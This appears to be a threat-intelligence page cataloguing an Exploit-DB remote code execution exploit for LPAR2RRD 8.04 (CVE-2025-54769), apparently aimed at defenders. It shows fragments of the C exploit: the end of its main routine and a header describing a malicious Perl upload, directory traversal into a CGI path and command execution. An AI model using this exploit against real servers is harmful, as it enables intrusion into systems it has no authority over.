inet_addr(ip); if (q == INADDR_NONE) { printf("\e[1;31m[-] Invalid Ip String !\e[0m\n"); syscallLinux(); } if (!ip) { fprintf(stderr,"\e[1;31m[-] Please Enter Target IP !\e[0m\n"); fprintf(stderr,"\e[1;31m[-] Ex : ./exploit -i <IP> \e[0m\n"); fprintf(stderr,"\e[1;31m[-] Exit Syscall\e[0m\n"); syscallLinux(); } if (verboseMode) { verboseMode = 1; } if (cookies) { useCookies = 1; } if (port) { portService = 1; } if (protocol) { protocolS = 1; } remoteCode(ip); curl_global_cleanup(); return 0; }

Source: Exploit-DB RSS Feed

Published: Sun Aug 03 2025

LPAR2RRD 8.04 - Remote Code Execution (RCE)

Critical

Exploitremote web rce exploit

Published: Sun Aug 03 2025 (08/03/2025, 00:00:00 UTC)

Source: Exploit-DB RSS Feed

Description

LPAR2RRD 8.04 - Remote Code Execution (RCE)

AI-Powered Analysis

AILast updated: 10/27/2025, 01:40:51 UTC

Technical Analysis

Potential Impact

Mitigation Recommendations

Affected Countries

Need more detailed analysis?Get Pro

Pro Feature

For access to advanced analysis and higher rate limits, contact root@offseq.com

Technical Details

Edb Id: 52391
Has Exploit Code: true
Code Language: c

Indicators of Compromise

Exploit Source Code

Exploit Code

Exploit code for LPAR2RRD 8.04 - Remote Code Execution (RCE)

/*
 * Author       : Byte Reaper
 * Title : LPAR2RRD 8.04 - Remote Code Execution (RCE)
 * CVE          : CVE-2025-54769 
 * Vulnerability: RCE && directory traversal
 * Description : Uploads a malicious Perl script via the LPAR2RRD upgrade endpoint, 
 * exploits directory traversal to place it in a CGI-executable path, then triggers remote command execution.
 */

 #include <stdio.h>
 #include <stdlib.h>
 #include <curl/curl.h>
 #include "argparse.h"
 #include <string.h>
 #include <time.h>
 #inc... (18460 more characters)

Code Length: 18,960 characters • Language: C/C++

Threat ID: 68900844ad5a09ad00dd9dfc

Added to database: 8/4/2025, 1:09:24 AM

Last enriched: 10/27/2025, 1:40:51 AM

Last updated: 11/4/2025, 10:43:39 AM

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by

Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Related Threats

Malicious VSX Extension "SleepyDuck" Uses Ethereum to Keep Its Command Server Alive

Medium

MalwareTue Nov 04 2025

MSSQL Exploitation - Run Commands Like A Pro

Medium

Security-newsMon Nov 03 2025

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

External Links

Original Source Raw Exploit Code Search on Google

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

LPAR2RRD 8.04 - Remote Code Execution (RCE)

AI Analysis

Technical Summary

Potential Impact

Mitigation Recommendations

Affected Countries

Indicators of Compromise

LPAR2RRD 8.04 - Remote Code Execution (RCE)

Description

AI-Powered Analysis

Technical Analysis

Potential Impact

Mitigation Recommendations

Affected Countries

Technical Details

Indicators of Compromise

Exploit Source Code

Exploit code for LPAR2RRD 8.04 - Remote Code Execution (RCE)

Community Reviews

Related Threats

Android Update Patches Critical Remote Code Execution Flaw

New Research: RondoDox v2, a 650% Expansion in Exploits

Hackers Weaponize Remote Tools to Hijack Cargo Freight

Malicious VSX Extension "SleepyDuck" Uses Ethereum to Keep Its Command Server Alive

MSSQL Exploitation - Run Commands Like A Pro

Actions

External Links

Need enhanced features?

Latest Threats

Keyboard Shortcuts

Navigation

Search & Filters

UI Controls

Accessibility